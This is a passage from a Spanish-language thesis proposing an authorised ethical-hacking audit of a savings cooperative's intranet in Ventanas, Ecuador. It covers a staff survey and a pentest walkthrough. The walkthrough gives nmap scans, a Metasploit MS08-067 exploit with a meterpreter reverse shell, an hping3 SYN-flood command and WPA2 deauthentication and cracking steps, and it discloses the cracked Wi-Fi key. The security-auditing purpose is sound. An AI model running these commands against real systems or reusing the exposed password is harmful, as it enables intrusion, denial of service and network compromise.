Esta fue fundamental en el proceso de investigación para obtener la mayor
cantidad de información sobre la cooperativa de ahorro y crédito y como se
encuentra actualmente la intranet, esta va a dejar ver los niveles de seguridad
en que se encuentra la intranet.
Validación por Expertos.
Se lo emplea para una obtener una mejor visión del proyecto por parte de
personal especializados en la seguridad.
Métodos Teóricos.
Métodos Histórico Lógico.
Se utilizó este método por que estudia la realidad y como el objeto de
investigación a evolucionado con el tiempo.
Método Analítico – Sintético. Se lo utilizó ya que se realizó toda una
recopilación investigativa de toda la teoría sobre las normas y metodologías
para asegurar la información y luego esto nos sirve para dar las conclusiones.
Método Inductivo – Deductivo.
Se lo utilizó para para buscar una solución al problema de los niveles de
seguridad de la intranet de la cooperativa. Por medio de la lógica deductiva,
45
intentar descubrir una solución que sería el Hacking Ético la cual revelara el
estado actual de la seguridad.
Método Sistémico.
Se utilizó porque permite el desarrollo de la tesis, etapa por etapa.
2.2.3. Técnicas e Instrumentos de la Investigación.
Técnicas de Investigación.
Encuesta.
La técnica que se utilizó para la recopilación de información será un
cuestionario realizado a los empleados de la Cooperativa de ahorro y crédi to 13
de Abril de la Ciudad de Ventanas.
Reuniones de Trabajo.
Se utilizó, ya que se realizaron reuniones para la elaboración de la valoración
de los activos, y el análisis de las vulnerabilidades que podían actuar o actúan
en cada uno de los activos del departamento de tecnologías de la información y
comunicación.
Instrumentos de Investigación.
Cuestionario.
Esta encuesta permitió obtener información necesaria, como un elemento
justificativo de la presente tesis, la cual se obtuvo por la colaboración de los
empleados de la Cooperativa de Ahorro y crédito 13 de Abril de la ciudad de
Ventanas.
Entrevista.
Permitió recopilar información del encargado de tecnologías de la Información y
comunicación de la cooperativa.
46
2.2.3.1. Población y Muestra.
Población. La población de la Cooperativa de Ahorro y crédito 13 de Abril a
tomar en cuenta para nuestra investigación es la siguiente.
Tabla 1. Población de la Cooperativa de Ahorro y Crédito 13 de Abril Ltda. Fuente: Autor de investigación
Muestra.
En este caso es pequeña por lo que se va a trabajar con todo el universo; es
decir los 16 empleados de la cooperativa de ahorro y crédito de Ventanas
2.2.3.2. Interpretación de Resultados de las encuestas Aplicadas.
Para la interpretación de los resultados se toma en cuenta los datos obtenidos
de la encuestan realizada a los empleados que laboran en la Cooperativa de
Ahorro y Crédito 13 de Abril.
Las preguntas de la encuesta a los empleados se encuentran en el Anexo 2.
47
1. ¿Existen medidas de seguridad en el departamento que usted labora?
Tabla 2. Respuesta, Encuesta Pregunta No 1, Empleados Fuente: Autor de investigación
Figura 12. Gráfico Estadístico Pregunta No 1, Empleados Fuente: Autor de investigación
Análisis e Interpretación.
En la gráfica de la pregunta muestra que el 6% de los empleados indica que
existe medidas de seguridad en el departamento que labora y el 94% indica
que no.
En los resultados obtenidos claramente se puede observar que los empleados
consultados no tienen conocimiento de las medidas de seguridad en la
cooperativa.
48
2. ¿De las siguientes medidas de seguridad marque con una X la que
considera que existen?
Tabla 3. Respuesta, Encuesta Pregunta No 2, Empleados Fuente: Autor de investigación
Figura 13. Gráfico Estadístico Pregunta No 2, Empleados Fuente: Autor de investigación
INDICADOR RESULTADO PORCENTAJE
CAMBIO DE CONTRASEÑA 7 42%
ANTIVIRUS INSTALADO Y
ACTUALIZADO
7 42%
BLOQUEO AUTOMATICO DEL
EQUIPO
0 0%
CONTROL DE ACCESO AL
EQUIPO
0 0%
CONTROL DE ACCESO A DISCOS
EXTRAIBLES
0 0%
REVISIÓN PERIODICA POR
PARTE DEL DEP. TI
1 8%
NINGUNA 1 8%
Total 16 100%
49
Análisis e Interpretación.
En la gráfica de la pregunta nos muestra que el 42% de los empleados realiza
cambio de contraseñas periódicamente otro 42% indica que se realiza
periódicamente la actualización del antivirus, 8% indica revisión periódica por
parte del TI, 8% no activa medidas de seguridad ningún empleado tiene
activado el bloqueo automático del equipo, no existe un control en el acceso de
los equipos, no existe control sobre los medios extraíble.
Este resultado indica que los empleados de la cooperativa de ahorro y crédito
no poseen seguridad en sus equipos lo que hace que sean susceptibles a los
ataques.
3. ¿Conecta usted su equipo portátil o algún dispositivo móvil a la red
inalámbrica de la cooperativa?
Tabla 4. Respuesta, Encuesta Pregunta No 3, Empleados Fuente: Autor de investigación
Figura 14. Gráfico Estadístico Pregunta No 3, Empleados
Fuente: Autor de investigación
INDICADOR RESULTADO PORCENTAJE
SI 15 94%
NO 1 6%
Total 16 100%
50
Análisis e Interpretación.
En la gráfica nos muestra que el 94% de los empleados conectan sus
dispositivos móviles a la red inalámbrico y apenas un 6% que no.
El resultado de esta pregunta indica que en la institución no existe un control
sobre los equipos que se conectan a la red inalámbrica.
4. ¿En caso de afirmativa la respuesta anterior marque con una X una de
las siguientes opciones?
Tabla 5. Respuesta, Encuesta Pregunta No 4, Empleados
Fuente: Autor de investigación
Figura 15. Gráfico Estadístico Pregunta No 4, Empleados
Fuente: Autor de investigación
Análisis e Interpretación.
La grafica nos muestra que el 100% de los empleados solicito una contraseña
en sus equipos portátiles para realizar la conexión.
INDICADOR RESULTADO PORCENTAJE
REALIZO LA CONEXIÓN SIN AYUDA 0 0%
SOLICITO CONTRASEÑA A TI 16 100%
EL ENCARGADO DE TECNOLOGÍAS REALIZO
ALGUNA TAREA CON SU EQUIPO
0 0%
Total 16 100%
51
Los resultados de esta pregunta concluyen que existen las medidas de
seguridad en cuanto al uso de la red inalámbrica sin embargo hay que medir
que tan eficiente son.
5. ¿Realiza usted alguna tarea para asegurar la información de la empresa
que se encuentra en su equipo?
Tabla 6. Respuesta, Encuesta Pregunta No 5, Empleados Fuente: Autor de investigación
Figura 16. Gráfico Estadístico Pregunta No 5, Empleados Fuente: Autor de investigación
Análisis e Interpretación.
La grafica nos muestra que el 1% de los empleados realizan alguna tarea por
salvaguardar la información del equipo que tiene a su cargo y 94% que no
realizan ninguna acción por asegurar su información.
INDICADOR RESULTADO PORCENTAJE
SI 1 6%
NO 15 94%
Total 16 100%
52
Esta pregunta nos muestra de que no existe ninguna preocupación por parte de
los empleados por mantener segura su información para evitar plagios o mal
uso de la misma.
6. ¿En caso de afirmativa la respuesta anterior marque con una X que
tareas realiza para asegurarla?
Tabla 7. Respuesta, Encuesta Pregunta No 6, Empleados Fuente: Autor de investigación
Figura 17. Gráfico Estadístico Pregunta No 6, Empleados
Fuente: Autor de investigación
INDICADOR RESULTADO PORCENTAJE
RESPALDA SUS ARCHIVOS 1 6%
ASIGNA CONTRASEÑA A LOS
ARCHIVOS
0 0%
PROGRAMA PARA ASIGNAR
CONTRASEÑA A SUS ARCHIVOS
0 0%
NINGUNA 15 94%
Total 16 100%
53
Análisis e Interpretación.
En la gráfica se muestra que el 6% de los empleados realizan solo un backup
de la información y lo interpretan como aseguramiento de la información, y el
94% restante de empleados no realiza ninguna acción.
Con los datos de esta pregunta se puede concluir que los empleados no
poseen asegurada su información y no existen medidas implementadas en los
equipos de la cooperativa inclusive las acciones básicas de seguridad.
7. ¿Existe alguna política de seguridad para él envió de contraseñas?
Tabla 8. Respuesta, Encuesta Pregunta No 7, Empleados Fuente: Autor de investigación
Figura 18. Gráfico Estadístico Pregunta No 7, Empleados Fuente: Autor de investigación
Análisis e Interpretación.
La grafica de esta pregunta muestra que el 100% de los empleados no conoce
si existe alguna política para él envió de contraseñas.
INDICADOR RESULTADO PORCENTAJE
SI 0 0%
NO 16 100%
Total 16 100%
54
Del análisis de los resultados de esta pregunta se concluye que no existen
políticas para los principales problemas por eso pueden ser explotados por
personas ajenas de la institución.
8. ¿Existe algún manual que detalle la transición de contraseñas entre
personal al momento de asumir alguna función o es cesado de su
puesto?
Tabla 9. Respuesta, Encuesta Pregunta No 8, Empleados Fuente: Autor de investigación
Figura 19. Gráfico Estadístico Pregunta No 8, Empleados Fuente: Autor de investigación
Análisis e Interpretación.
El resultado de esta pregunta muestra que el 100% de los empleados ignoran
la existencia de algún manual de procedimientos.
La grafica de esta pregunta indica que no se encuentra documentado ciertos
procesos de aseguramiento de las contraseñas de las aplicaciones de la
INDICADOR RESULTADO PORCENTAJE
SI 0 0%
NO 16 100%
Total 16 100%
55
institución, y esto puede afectar al funcionamiento algún servicio que brinda la
cooperativa.
9. ¿Usa su correo electrónico para responder cadenas o correos de
destinatarios desconocidos?
Tabla 10. Respuesta, Encuesta Pregunta No 9, Empleados Fuente: Autor de investigación
Figura 20. Gráfico Estadístico Pregunta No 9, Empleados Fuente: Autor de investigación
Análisis e Interpretación.
Los resultados de esta pregunta muestran que el 13 % de los empleados no
responden a los correos de destinatarios desconocidos y existe un 87 % que sí.
Esta pregunta indica que existen un gran número de personas que reciben y
contestan a correos peligrosos donde solicita muchas veces información
confidencial lo que es una falla de seguridad por parte de los empleados.
INDICADOR RESULTADO PORCENTAJE
SI 14 87%
NO 2 13%
Total 16 100%
56
10. ¿Cree usted que se requiere implantar ciertos niveles de seguridad en
la intranet y los servicios de la cooperativa?
Tabla 11. Respuesta, Encuesta Pregunta No 10, Empleados Fuente: Autor de investigación
Figura 21. Gráfico Estadístico Pregunta No 10, Empleados
Fuente: Autor de investigación
Análisis e Interpretación.
La grafica de esta pregunta muestra que el 100% de los empleados considera
que se debería implantar ciertos niveles de seguridad en la intranet y los
servicios de la cooperativa.
Con el resultado de esta pregunta se observa que los empleados consideran
que deberían implantarse medidas de seguridad, lo cual ayuda a la empresa a
incorporar planes y políticas de seguridad y manifiestan una aceptación al
cambio.
INDICADOR RESULTADO PORCENTAJE
SI 16 100%
NO 0 0%
Total 16 100%
57
11. ¿Cree usted que se debe realizar un hacking ético en la red de la
cooperativa para comprobar los niveles seguridad?
Tabla 12. Respuesta, Encuesta Pregunta No 11, Empleados Fuente: Autor de investigación
Figura 22. Gráfico Estadístico Pregunta No 11, Empleados
Fuente: Autor de investigación
Análisis e Interpretación.
La gráfica muestra que el 100% de los empleados están de acuerdo con el
hacking ético para medir los niveles de seguridad de la cooperativa.
El resultado de esta pregunta da a conocer a los niveles jerárquico superior de
que la realización de un hacking ético es indispensable para saber los niveles
de seguridad de la intranet donde están disponibles los servicios de la
cooperativa.
INDICADOR RESULTADO PORCENTAJE
SI 16 100%
NO 0 0%
Total 16 1005
58
2.3 Propuesta del Investigador.
Después de tabular los resultados de la investigación de campo se propone el
desarrollo de una estrategia de Hacking ético, esta se realizará primero con un
reconocimiento de la infraestructura tecnológica, para continuar con un
escaneo de los puertos y servicios activados en la intranet finalizando con la
intrusión a los equipos de la red explotando una vulnerabilidad , de la
cooperativa de ahorro y crédito 13 de abril Ltda de la ciudad de “Ventanas”,
esta estrategia permitirá comprobar los niveles de seguridad de la intranet a
través de las diferentes fases del hacking, y así realizar las tareas necesarias
que permita mejorar la seguridad informática con las recomendaciones de
implementación realizadas.
2.4 Conclusiones Parciales del Capítulo.
No existen medidas de seguridad de los equipos de los empleados muy
poco de ellos constatan que el antivirus este actualizado y sus equipos
tengan contraseñas seguras pero no existe ningún tipo de exigencia o
configuración en los equipos por parte del departamento de TICS para
aseguramiento de las estaciones de trabajo.
Existe poco control en las conexiones de equipos inalámbricos por parte
de la unidad de tics, los empleados saben la contraseña por lo tanto
hasta equipos externos a la institución se encuentran conectados a los
mismos, lo que hace posible cualquier tipo de intrusión a través de este
medio.
Existe poco conocimiento por parte de los empleados de medidas de
seguridad en el desplazamiento y tratamiento de información
confidencial como por ejemplo contraseñas y documentos confidenciales
etc.
59
No conocen los empleados las medidas de seguridad que se debe
tener en cuenta al contestar correo de destinatarios desconocidos.
Los empleados están de acuerdo que la información que se traslada a
través de la intranet de la cooperativa de ahorro y crédito 13 de Abril de
la ciudad de ventanas es sensible y debe tener ciertos niveles de
seguridad.
60
CAPITULO III
3. VALIDACIÓN Y/O EVALUACIÓN DE RESULTADOS DE SU APLICACIÓN
3.1. Título de la Propuesta.
Estrategia de Hacking Ético para mejorar los niveles de seguridad en la intranet
de la cooperativa de ahorro y crédito 13 de abril Ltda de la ciudad de
“ventanas”.
3.2. Caracterización de la propuesta.
La propuesta está orientada al desarrollo de un Hacking Ético que contribuya al
mejoramiento de la gestión de los niveles de seguridad de la intranet ,basadas
en las etapas del Reconocimiento, Escaneo, Obtener Acceso, Realizar Informe
y Presentar el informe proyecto que está destinado a ser implementado en la
cooperativa de ahorro y crédito 13 de abril Ltda. de la ciudad de “Ventanas”.
Luego de Realizar un reconocimiento de la infraestructura tecnológica de la
Cooperativa se realizara un escaneo a Nivel de software de todos los equipos
informáticos para realizar la explotación de las vulnerabilidades con
herramientas destinadas a realizar esta tarea para llegar a realizar un informe
con los hallazgos en la infraestructura tecnológica e implementar las soluciones
para mejorar los niveles de seguridad en la intranet de la cooperativa.
Hacking Ético de caja blanca (White box Hacking).
Esta parte de la propuesta, describe el proceso hacking transparente. Esta
modalidad se aplica a pruebas de intrusión internas solamente y se llama de
esta forma porque la empresa cliente le da al consultor información completa
de las redes y los sistemas a auditar.
El proceso de escaneo y obtención de acceso se lo realiza en conjunto con el
departamento de TIC´s para constatar que los equipos quedan en el estado
61
inicial es decir antes de la intrusión. Luego de realizar un análisis de
vulnerabilidades a los equipos Windows y Linux que se encuentran en la
intranet se establecerá los controles e implementaciones necesarias para
mejorar la seguridad de la intranet de la red de la cooperativa de ahorro y
crédito 13 de Abril de la ciudad de ventanas
3.3. Desarrollo de la propuesta.
Esquema General de la Propuesta.
Fases del Hacking Ético.
Figura 23. Esquema de Hacking Ético Fuente: (Astudillo Karina, 2013) Hacking Ético 101
3.3.1. Fase de Reconocimiento
El reconocimiento que se realiza a la Cooperativa es Activo ya que existe una
interacción directa con el objetivo o víctima y se opta por realizar un Mapeo de
Red.
62
Una vez obtenida la configuración de la red facilitada por el encargado de
tecnologías procedemos a realizar un Mapeo de la Red con la herramienta de
análisis de red provista por CAIN la cual es opensource y dispone de una
versión de Linux los resultados de este mapeo de la red que se obtiene se
pueden observar en la gráfica.
Ilustración 1. Análisis de la red con CAIN & ABEL Fuente: Autor de investigación
En la gráfica podemos observar los sistemas operativos de los equipos de la
intranet de la cooperativa y los nombres de los equipos.
Está información es muy importante ya que ha través de esta podemos verificar
en la siguientes etapas que exploit podemos utilizar para alguna vulnerabilidad
del Sistema Operativo.
La segunda herramienta utilizada para realizar el mapeo de la red es a través
de Zenmap con la dirección IP que nos proporcionó el departamento de TIC´S
nos damos cuenta que la red es 192.168.0.0./24 para la detección de todas las
direcciones IP de los equipos de la red vamos utilizar la herramienta ZNMAP a
63
través del comando nmap -sP 192.168.0.0/24, este comando nos permite
realizar un escaneo de todas las direcciones ip de los equipos encendidos de
nuestra red tal como se muestra en la figura.
Ilustración 2. Informe de escaneo General ZMAP Fuente: Autor de investigación
Esta grafica nos muéstralos equipos y la topología con sus respectivas
direcciones IP los que facilita información importante para poder realizar algún
ataque a cualquiera de los equipos provistos en la red.
3.3.2. Fase de Escaneo.
Durante la fase anterior se ha logrado recabar información variada sobre
nuestros objetivos identificados en la red. Tomando encuentra que el Hacking
es Interno por lo tanto ya tenemos identificado las direcciones IP de la red
interna de la Cooperativa de Ahorro y Crédito 13 de Abril de la Ciudad de
Ventanas.
Ahora se continúa con la fase de Escaneo en el cual se va obtener la
información de los sistemas operativos y puertos habilitados con sus
respectivos servicios esta tarea se realiza con la herramienta ZENMAP con el
64
siguiente comando de tipo connect nmap –sT –O 192.168.0.0/24 cuyos
resultados se encuentran detallados a continuación.
La dirección IP analizar es: 192.168.0.15 (online)
Address
192.168.0.15 - (ipv4)
D0:50:99:02:E8:04 - ASRock Incorporation (mac)
Ports
The 996 ports scanned but not shown below are in state: filtered
Ilustración 3. Fase de escaneo
Fuente: Autor de investigación
Remote Operating System Detection
Used port: 80/tcp (open)
OS match: Microsoft Windows 2000 SP4 (100% )
OS match: Microsoft Windows XP SP2 or SP3 (100% )
Una vez realizada el escaneo total de la red localizamos equipos windows y
Linux, en el caso mostrado en la tabla anterior podemos observar la dirección
Port State(toggleclosed
[0] | filtered [0])
Service Reason Product Version Extra
info
80 Tcp open http syn-ack
139 Tcp open netbios-
ssn
syn-ack Microsoft
Windows
98
netbios-
ssn
443 Tcp open https syn-ack
445 Tcp open microsoft-
ds
syn-ack Microsoft
Windows
XP
microsoft-
ds
65
ip en este caso 192.168.0.15 que esta online o encendida la dirección mac ,el
tipo de mainboard que posee, que están habilitados los puertos 80,139,443,445
la descripción de los servicios utilizan esos puertos. El puerto usado en este
caso el 80 y el sistema operativo en este caso Windows XP SP3.
En el Anexo 3 se encuentra detallado todo el archivo resultante del análisis de
cada uno de los equipos de la red.
Como podemos observar en el escaneo de los equipos de la red se encuentran
los números de los puertos la descripción del servicio y el sistema operativos lo
que nos facilita el trabajo de localizar las vulnerabilidades para ser luego
explotadas a través de una herramienta llamada Meta-exploit.
Con la información obtenida hasta el momento procedemos utilizar un
analizador de vulnerabilidad con el objetivo de facilitar la labor ya que permite
realizar en una sola interfaz y enumeraciones sobre el objetivo, y a la vez
identifican las vulnerabilidades presentes en dichos sistemas y las clasifican al
nivel de riesgo presente.
La identificación se realiza de acuerdo a la versión del sistema operativo y de
los servicios y aplicaciones detectados comparándolos contra una base de
datos de vulnerabilidades que se actualiza frecuentemente conforme nuevos
huecos de seguridad son descubiertos.
Los niveles de riesgo se clasifican usualmente en: bajo, medio y alto, conforme
a la siguiente escala:
Riesgo Alto: el equipo tiene una o más vulnerabilidades críticas que podrían
ser explotadas fácilmente por un atacante y que podrían conllevar a tomar
control total del sistema o comprometer la seguridad de la información de la
organización. Los equipos con este nivel de riesgo requieren acciones
correctivas inmediatas.
66
Riesgo Medio: el equipo tiene una o más vulnerabilidades severas que
requieren una mayor complejidad para poder ser explotadas y que podrían no
brindar el mismo nivel de acceso al sistema afectado. Los equipos con riesgos
severos requieren atención a corto plazo.
Riesgo Bajo: el equipo tiene una o más vulnerabilidades moderadas que
podrían brindar Información a un atacante, la cual podría utilizarse para realizar
ataques posteriores. Estos riesgos deben ser mitigados adecuadamente, pero
no tienen un nivel de urgencia alto.
Análisis de vulnerabilidades con OpenVas.
Para levantar OpenVas se selecciona la opción openvas-setup del menú de
Kali LINUX-Vulnerability-Analysis-Open Vas- openvas-setup.
Ilustración 4. Kali Linux acceso a OpenVas Fuente: Autor de investigación
67
Para realizar el análisis utilizamos la interfaz Greenbone Security Desktop,
GSD.
Ilustración 5. Interfaz de Administración de análisis de Open Vas
Fuente: Autor de investigación
La interfaz Web de Greenbone Security muestra la pantalla y nos da las
instrucciones y podemos observar una casilla de texto donde se ubica la
dirección ip de la víctima para nuestro caso es 192.168.0.6 y se procede a dar
click en StartScan.
Una vez realizado el escáner para visualizar el resultado click en la dirección ip
que aparece en la parte superior de la interfaz que a continuación se muestra.
Ilustración 6. Resultado Escaner Ip. 192.168.0.6 Fuente: Autor de investigación
68
Luego para visualizar el reporte nos dirigimos a la opción Scan Management en
la opción Report y nos muestra la siguiente pantalla
Ilustración 7. Resultado de Administración de análisis de OpenVas
Fuente: Autor de investigación
Esta pantalla nos muestra el reporte que podemos descargar dando click en la
fecha, la cual nos muestra un reporte en pantalla con las vulnerabilidades
encontradas en el equipo y su respectiva descripción como a continuación se
muestra.
69
Ilustración 8. Análisis de Vulnerabilidades. Fuente: Autor de investigación
Este reporte nos muestra un detalle del análisis la vulnerabilidad encontrada el
nivel de amenaza que está expuesto el equipo y el puerto, también podemos
exportar este archivo a pdf para observar un informe más detallado a
continuación se detalla un fragmento de este informe para observar
completamente el informe puedo hacerlo en el Anexo 4.
Ilustración 9. Análisis de los puertos que tienen vulnerabilidades Fuente: Autor de investigación
En este cuadro podemos observar que el puerto 445 /tcp se encuentra en nivel
alto la vulnerabilidad, y este puerto 445 se encuentra activado en la mayoría de
Service(Port) ThreatLevel 445/tcp High
445/tcp Log general/tcp Log general/icmp Log general/SMBClient
Log general/CPE-T Log 139/tcp Log
70
los equipos Windows de la cooperativa por lo tanto se realiza una descripción y
como es el proceso de explotación a través de este puerto.
Descripción del puerto 445. Este puerto es usado para trabajar con el
protocolo SMB (Sever Message Block), es utilizado para compartir archivos en
windowsNT/2000/XP. En Windows NT corría sobre NetBT, que viene a ser
NetBIOS sobre TCP/IP), utilizando los conocidos puertos 137, 138 (bajo UDP)
y 139 (con TCP). En Windows 2000/XP/2003, se añade la posibilidad de utilizar
SMB directamente sobre TCP/IP, sin esa capa adicional en NetBT. Para tal
propósito, se utiliza el puerto 445.
En su forma más simple, NetBIOS en su red pueda que sea algo inofensivo.
NetBIOS en su WAN , o LAN con acceso a Internet puede resultar sin embargo
en un riesgo de seguridad enorme. Cualquier tipo de información, como su
nombre de Dominio, grupo de trabajo o estaciones, tanto como la información
de las cuentas de usuario es obtenible via NetBIOS. Es muy importante
entonces, que NetBIOS no salga de su red.
Una vez conocido el puerto procedemos a realizar una búsqueda de algún
exploit que nos permita vulnerar Windows para esto ejecutamos msfconsole en
kali linux.
3.3.3. Fase de Explotación.
Ilustración 10. Interfaz de Meta Exploit de Kali Linux Fuente: Autor de investigación
71
Luego se procede a realizar una búsqueda de un exploit para el puerto 445 de
Microsoft Windows a través del comando.
Ilustración 11. Visualización de exploit de Kali Linux Fuente: Autor de investigación
Nos aparece mucho meta exploit y auxiliares que podemos utilizar pero el
recomendado para esa vulnerabilidad es el ms 08_067_netapi
Ilustración 12. Selección de Exploit Fuente: Autor de investigación
72
Ahora procedemos a ponerlo en uso al exploit.
Ilustración 13. Uso del exploit Fuente: Autor de investigación
Luego se aplica el comando set payload windows/meterpreter/reverse_tcp
Ilustración 14. Etapa de ejecución del Exploit
Fuente: Autor de investigación
73
Luego se procede a visualizar las opciones del exploit para esto usamos el
comando show option aparecerá un resultado parecido al de la pantalla.
Ilustración 15. Etapa de ejecución del Exploit
Fuente: Autor de investigación
Podemos observar en la gráfica dos datos a ingresar RHOST que recibe como
parámetro la ip de la víctima en nuestro caso la ip 192.168.0.6 , LHOST que es
la ip de nuestra maquina con KALI LINUX ambos son ingresados con el
comando set proceso que se muestra en la gráfica.
74
Ilustración 16. Etapa de ejecución del Exploit
Fuente: Autor de investigación
Luego que se realiza el ingreso de parámetro se ejecuta el exploit con el
comando de ese mismo nombre a continuación se observa en la gráfica el
proceso y al final aparece la palabra meterpreter, lo que indica que se ha
ingresado al sistema operativo y podemos realizar muchas cosas las cuales las
podemos visualizar con el comando help.
Ilustración 17. Etapa de ejecución del Exploit
Fuente: Autor de investigación
75
Ahora hay que proceder a dejar evidencia de que se pudo acceder a la
máquina para lo cual vamos a crear tres directorio uno llamado hola, haz, sido,
hackeado en la unidad C: para esto usamos el comando mkdir.
Ilustración 18. Evidencia creación de carpetas Fuente: Autor de investigación
Esto se la realiza con el objetivo de que quede evidencia de que ha sido
vulnerado el equipo.
Ataque Dos con Hping3
La instalación de Hping3 se realizó en el equipo cliente Ubuntu, a
través del comando que se describe en la Grafico 3.1.
Ilustración 19. Proceso de instalación de Hping3
Fuente: Autor de investigación
76
Para la ejecución del ataque se ingresó el comando sudo hping3 –p 80 –S
-- flood
192.168.0.X –d 50000, tal como se muestra en la Figura 3.2. Se describe el
comando aplicado a continuación:
-p.- Se especifica el puerto que se va a saturar.
-S.- Activa el Flag SYN.
--flood.- Indica a hping que envíe los paquetes a la máxima velocidad posible.
-d.- Se establece el tamaño del cuerpo del paquete (bytes).
Ilustración 20. Comando de ejecución Hping3
Fuente: Autor de investigación
Ataque a la red wireless.
Luego de la revisión de los equipos de la intranet y realizar el ataque
correspondiente y obtener el acceso se constata de la existencia de un wireless
del cual se obtine el siguiente escaneo, para esto utilizaremos la distribución de
Kali Linux los pasos realizados para la revisión de la seguridad del wireless se
muestra a continuación.
77
Primero se verifica la descripción de la red inalámbrica para esto ejecutamos el
siguiente comando.
ifconfig –a
Luego le indicamos a KALI que detecte la tarjeta.
Ilustración 21. Análisis de wireless con aimon-ng
Fuente: Autor de investigación
Luego desactivamos la tarjeta de red inalámbrica para cambiar nuestra
dirección física y la activamos nuevamente.
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
El siguiente paso fue poner en modo monitor nuestra trajeta de red inalámbrica
para realizar un escaneo de las redes wireless con el siguiente comando
Airodump-ng mon0
Ilustración 22. Análisis de wireless con Airodump-ng mon0 Fuente: Autor de investigación
78
La imagen nos muestra la red inalámbrica de la cooperativa de ahorro y crédito
la cual es WLAN_XX.
Luego vamos a capturar paquetes de la red inalámbrica para esto utilizamos la
información escaneada y utilizamos el siguiente comando.
airodump-ng --bssid 38:72:c0:E1:60 -c 11 -w wpa2labs.cap mon0
a continuación se detalla una descripción y parámetros del comando.
-- bssid : Es el MAC del router que vamos a atacar
-c : Es el canal en el que está trabajando el router
-w : Especificamos el nombre del archivo .cap
mon0 : Es el interfaz de la red
Ahora debemos esperar hasta que algún cliente se autentique a la red
inalámbrica, utilizando el siguiente comando, para realizar el deslogueo de la
red inalámbrica.
aireplay-ng -0 30 -a 5C:33:8E:A7:D4:B8 mon0
Aquí explicamos el número 30 es el número de des autenticaciones que vamos
a mandar al router, luego especificamos la MAC del router y finalmente la
interfaz de red que usamos.
79
Ilustración 23. Análisis de wireless Fuente: Autor de investigación
80
Una vez capturados los datos descargamos un diccionario de la página de
Dragon Jar.
Ilustración 24. Descarga del diccionarios Fuente: Autor de investigación
Como vemos existen muchos y Buenos con un tamaño sumamente extenso
decargamos el diccionario claves wpa 17-in-1 parte uno, dos, tres aircrack-ng -
w ataq.txt captura-01.cap. Con este comando comenzamos a ver si la clave
está basada en una palabra de diccionario.
Ilustración 25. Análisis de la clave Fuente: Autor de investigación
81
Luego de a hora aproximadamente la clave estaba basada en una palabra de
diccionario como vemos era coop098765432.
3.3.4. Informe de Hallazgos.
Auditoría a la infraestructura de la cooperativa de Ahorro y Crédito 13
Abril Ltda.
Misión.
Ser la institución de intermediación financiera, comprometida con el desarrollo
con el desarrollo socioeconómico de sus cooperados y la comunidad, a través
de la prestación de servicios y productos financieros competitivos y no
financieros, dentro de la provincia de los Ríos y sus zonas de influencia
cercana.
Visión.
La Cooperativa de Ahorro y Crédito “13 de Abril”, es un referente del sistema
de Economía popular y solidaria en la provincia de los Ríos y sus zonas de
influencia, a través de proceso, metodologías e infraestructura adaptadas a los
requerimientos de nuestros socios; personal especializado en administración
financiera y sistemas de administración eficientes.
Valores.
Responsabilidad
Democracia
Igualdad
Equidad
Solidaridad
Servicios.
Pago de Matrícula Vehicular
Pago de Servicios Interbancarios a través del Banco Central (SPI)
Transferencias de Sueldos
Servicios Exequiales hasta 1.200 por fallecimiento del socio
82
Pago de Servicio Básicos
Tipos de Prestamos.
Microcréditos (Comerciantes, Artesanos, Agricultores, Asociaciones)
Vivienda
Consumo
Emergentes
Anticipos hasta 2 sueldos
Seguros de desgravamen
Nuestros préstamos tienen las tasas de interés más bajas del mercado.
La cooperativa de Ahorro y Credito 13 de Abril tiene dos sucursales una
en la parroquia San Juan y otra en la ciudad de Babahoyo.
Orgánico Funcional.
Gráfico 24 Orgánico funcional
Fuente: Cooperativa de Ahorro y Crédito 13 de Abril
83
Puestos de Trabajo.
Tabla 13. Número de empleados Fuente: Unidad de Talento Humano
Hardware y Software de la cooperativa de Ahorro y Crédito 13 de Abril.
Hardware.
Equipos de Escritorio.
Procesador G2030 de 3.0GHZ.
DDr3 memoria Ram de 2 gb.
Disco duro de 320 GB.
Server.
Processor Intel Xeon E5-2400 family Chipset Intel C600 Series
Processor number 1 or 2
Processor core available 4/6/8
Processor speed 1.8–2.4 GHz
Processor cache 20 MB L3 15 MB L3 10 MB L3
Memory slots 12 DIMM slots (6 memory slots per socket)
Memory maximum 192 GB
Memory type DDR3 (registered and unbuffered)
Memory protection features Advanced ECC, online spare, lock-step mode
Internal storage Up to 18 LFF or 24 SFF drives – HDD/SSD Max internal
storage 54 TB
Storage controllers HP Smart Array B120i controller HP Smart Array P222
controller HP Smart Array P420 controller HP Smart Array P421 controller HP
Smart Array P822 controller
Network controller HP Ethernet 1 Gb 2-port 361i Adapter
Total de Empleados de la Cooperativa
de Ahorro y crédito 13 de Abril
Total 16
84
Expansion slots 6 PCIe 4 PCIe Gen3 Slots and 2 PCIe Gen2 slot
Remote management software iLO Management Engine, Insight Control
(optional)
System fans features 2 non-hot plug non-redundant fans ship standard (support
up to 4 fans)
Power supply type 460W/750W (with 92% gold or 94% platinum plus efficiency
Software.
El sistema que utilizan en la Cooperativa de Ahorro y Crédito es
CONEXUS MILLENIUM desarrollado en el lenguaje de programación
Visual Basic 6.0.
La base de datos en SQL SERVER
Su servidor cliente/servidor versión 5.0 S.O red hat 6.4
Sistema Operativos que utilizan los usuarios es Windows XP SP3
Objetivos.
Objetivo General.
Auditar los niveles de seguridad de la intranet de la cooperativa de ahorro y
crédito 13 de Abril de la ciudad de Ventanas para controlar los accesos a los
servicios y a los equipos de escritorio.
Objetivos Específicos.
Determinar la existencia de amenazas y vulnerabilidades que están
expuestos los equipos de escritorio.
Determinar cuáles son los puertos y protocolos vulnerables que
permitirían acceso sin autorización a los equipos de la intranet.
Evaluar el acceso lógico y físico ,los controles de seguridad del
ambiente informático.
85
Alcance.
Al final de este trabajo de auditoría la institución obtendrá:
Informe de hacking ético aplicado a la intranet de la cooperativa de
ahorro y crédito 13 de Abril de la ciudad de Ventanas.
Dominios a Auditar.
Puertos y protocolas activos en los equipos de la intranet.
Protocolos activos en los equipos de la intranet.
Servicios de Sql Server.
Seguridad lógica de los Equipos de la red.
Para ejecutar la presente auditoría se ha planificado el siguiente cronograma
de trabajo:
86
Cronograma de Trabajo
Tabla 14. Cronograma de actividades de Auditoría Fuente: Autor de investigación
Criterios de Auditoría a Utilizarse.
Para realizar la auditoría se han tomado como referencia las etapas de Hacking
Ético.
Recurso de personal.
Para la presente auditoría participará 1 Auditor Informático y se requiere de la
colaboración de una persona del área de tecnologías de la información de la
institución así como del apoyo de la Alta Gerencia, para poder recabar toda la
información necesaria.
Actividad Tiempo
